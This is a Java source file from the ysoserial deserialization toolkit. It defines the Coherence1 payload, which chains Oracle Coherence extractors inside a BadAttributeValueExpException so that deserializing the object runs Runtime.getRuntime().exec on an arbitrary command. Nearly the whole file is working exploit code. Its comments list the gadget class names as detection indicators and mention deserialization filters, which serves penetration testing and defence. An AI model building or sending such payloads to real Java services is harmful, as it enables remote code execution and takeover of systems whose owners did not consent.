package ysoserial.payloads;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;
import javax.management.BadAttributeValueExpException;
import java.io.File;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.URL;
import java.net.URLClassLoader;
/**
 * ysoserial payload builder that assembles a serializable object graph out of Oracle
 * Coherence classes (ReflectionExtractor, ChainedExtractor, LimitFilter) and wraps it in a
 * {@link BadAttributeValueExpException}.
 *
 * <p>The Coherence classes are not compile-time dependencies of this file: they are loaded
 * reflectively from a jar whose path is passed inside the command string.
 *
 * <p>Defensive notes: a stream produced from the returned object carries class descriptors
 * for {@code javax.management.BadAttributeValueExpException},
 * {@code com.tangosol.util.filter.LimitFilter},
 * {@code com.tangosol.util.extractor.ChainedExtractor} and
 * {@code com.tangosol.util.extractor.ReflectionExtractor}. Those names are usable as
 * detection indicators, and an endpoint that must deserialize untrusted data can reject
 * them with a deserialization filter ({@code java.io.ObjectInputFilter}); an allow-list of
 * expected classes is more robust than blocking individual gadget classes.
 *
 * <p>Original header: Date 2021/7/26 5:18 pm, Version 1.0.
 */
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"oracle coherence:oracle coherence:dynamic"})
@Authors({Authors.BEARCAT})
public class Coherence1 implements ObjectPayload<Object>{
/**
 * Builds the payload object for the given command string.
 *
 * <p>Expected format, per the usage message thrown below:
 * {@code rely_jar:<path to coherence jar>@<command>}. The segment before the first
 * {@code @} must start with {@code rely_jar:} (compared case-insensitively).
 *
 * @param command jar location and command, separated by {@code @}
 * @return a BadAttributeValueExpException whose private {@code val} field holds the
 *         configured LimitFilter instance
 * @throws IllegalArgumentException if the first segment does not start with {@code rely_jar:}
 * @throws Exception on any class-loading or reflection failure
 */
@Override
public Object getObject(String command) throws Exception {
// Splits on every '@', so only the text between the first and second '@' ends up in cmd[1].
String[] cmd = command.split("\\@");
String relyJar = null;
if (cmd[0].toLowerCase().startsWith("rely_jar:")) {
// Everything after the first ':' is taken as the jar path.
relyJar = cmd[0].substring(cmd[0].indexOf(":") + 1);
} else {
throw new IllegalArgumentException("Command format is: [rely_jar]:/coherenceDir/coherence_weblogic12.1.3.0.0.jar@open /System/Applications/Calculator.app");
}
// Load the Coherence classes from the caller-supplied jar instead of the build classpath.
// NOTE(review): the URLClassLoader is never closed. Closing it here may break class
// resolution that happens later, outside this method - confirm before changing.
File file = new File(relyJar);
URL url = file.toURI().toURL();
ClassLoader loader = new URLClassLoader(new URL[]{url});
Class<?> classReflectionExtractor = loader.loadClass("com.tangosol.util.extractor.ReflectionExtractor");
Class<?> classChainedExtractor = loader.loadClass("com.tangosol.util.extractor.ChainedExtractor");
Class<?> classLimitFilter = loader.loadClass("com.tangosol.util.filter.LimitFilter");
// NOTE(review): classValueExtractor is loaded but not referenced again in this method.
Class<?> classValueExtractor = loader.loadClass("com.tangosol.util.ValueExtractor");
// Each ReflectionExtractor is built with (method name, argument array).
// NOTE(review): the same (String, Object[]) constructor is looked up three times.
// Step 1: getMethod("getRuntime", no parameter types) - corresponds to Runtime.class.getRuntime().
Constructor<?> constructorReflectionExtractor1 = classReflectionExtractor.getConstructor(String.class, Object[].class);
Object extractor1 = constructorReflectionExtractor1.newInstance("getMethod", new Object[]{"getRuntime", new Class[0]});
// Step 2: invoke(null, no arguments) on the Method produced by step 1.
Constructor<?> constructorReflectionExtractor2 = classReflectionExtractor.getConstructor(String.class, Object[].class);
Object extractor2 = constructorReflectionExtractor2.newInstance("invoke", new Object[]{null, new Object[0]});
// Step 3: exec(<command segment>) on the result of step 2.
// NOTE(review): cmd[1] is read without checking cmd.length. An input that has the
// rely_jar: prefix but no '@' passes the check above and fails here with
// ArrayIndexOutOfBoundsException instead of the usage message.
Constructor<?> constructorReflectionExtractor3 = classReflectionExtractor.getConstructor(String.class, Object[].class);
Object extractor3 = constructorReflectionExtractor3.newInstance("exec", new Object[]{cmd[1]});
// Array.newInstance gives a ReflectionExtractor[] typed against the classes from `loader`.
Object arrays = Array.newInstance(classReflectionExtractor, 3);
Array.set(arrays, 0, extractor1);
Array.set(arrays, 1, extractor2);
Array.set(arrays, 2, extractor3);
// Select the ChainedExtractor(ValueExtractor[]) constructor by comparing its toString() text.
// NOTE(review): if no constructor matches, chainedExtractor stays null and is stored
// into m_comparator below without any error.
Object chainedExtractor = null;
Constructor<?>[] constructorClassChainedExtractor = classChainedExtractor.getConstructors();
for (Constructor<?> constructor:constructorClassChainedExtractor){
if(constructor.toString().equalsIgnoreCase("public com.tangosol.util.extractor.ChainedExtractor(com.tangosol.util.ValueExtractor[])")){
chainedExtractor = constructor.newInstance(arrays);
}
}
// Write the chained extractor into LimitFilter's m_comparator field via reflection.
// NOTE(review): Class.newInstance() is deprecated since Java 9.
Object limitFilter = classLimitFilter.newInstance();
Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
m_comparator.setAccessible(true);
m_comparator.set(limitFilter, chainedExtractor);
// Write Runtime.class into LimitFilter's m_oAnchorTop field.
// Presumably this is the value LimitFilter passes to m_comparator when its toString()
// runs; LimitFilter's source is not shown here - confirm.
Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
m_oAnchorTop.setAccessible(true);
m_oAnchorTop.set(limitFilter, Runtime.class);
/*
BadAttributeValueExpException is the outer object; the original note refers to its
toString() use on the wrapped value.
NOTE(review): the original note ties this to jdk8u76 and the commit linked below, but its
wording was ambiguous about which JDK builds lack BadAttributeValueExpException#readObject() -
confirm against the commit.
https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR70
*/
// The constructor receives null, then the private `val` field is overwritten reflectively
// so that it holds the LimitFilter instance itself.
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
field.setAccessible(true);
field.set(badAttributeValueExpException, limitFilter);
return badAttributeValueExpException;
}
/**
 * Command-line entry point: hands this payload class and the arguments to PayloadRunner.
 *
 * @param args command-line arguments forwarded unchanged to {@code PayloadRunner.run}
 * @throws Exception propagated from {@code PayloadRunner.run}
 */
public static void main(String[] args) throws Exception{
PayloadRunner.run(Coherence1.class,args);
}
}